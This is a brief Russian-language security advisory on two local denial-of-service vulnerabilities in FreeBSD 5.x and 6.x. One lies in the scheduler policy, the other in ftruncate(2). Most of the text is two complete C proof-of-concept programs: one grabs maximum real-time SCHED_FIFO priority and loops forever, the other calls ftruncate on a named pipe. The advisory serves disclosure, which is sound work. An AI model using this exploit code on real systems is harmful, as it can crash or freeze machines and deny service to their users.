Программа: FreeBSD 5.x, FreeBSD 6.x
Уязвимость позволяет локальному злоумышленнику выполнить DoS атаку на целевую систему.
1) Уязвимость существует из-за ошибки в политике планирования FreeBSD Scheduler Policy. Локальный атакующий может вызвать отказ в обслуживании.
Пример:
#include <sched.h>
int main(){
struct sched_param lol;
lol.sched_priority = sched_get_priority_max(SCHED_FIFO);
sched_setscheduler(0,SCHED_FIFO,&lol);
for(;;){}
}
2) Уязвимость существует из-за ошибки в вызове ftruncate(2). Локальный атакующий может выполнить DoS атаку на целевую систему.
Пример:
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
int main(){
mkfifo("lol",0x1b6);
int fd = open("lol",O_RDWR);
ftruncate(fd,12345);
close(fd);
}
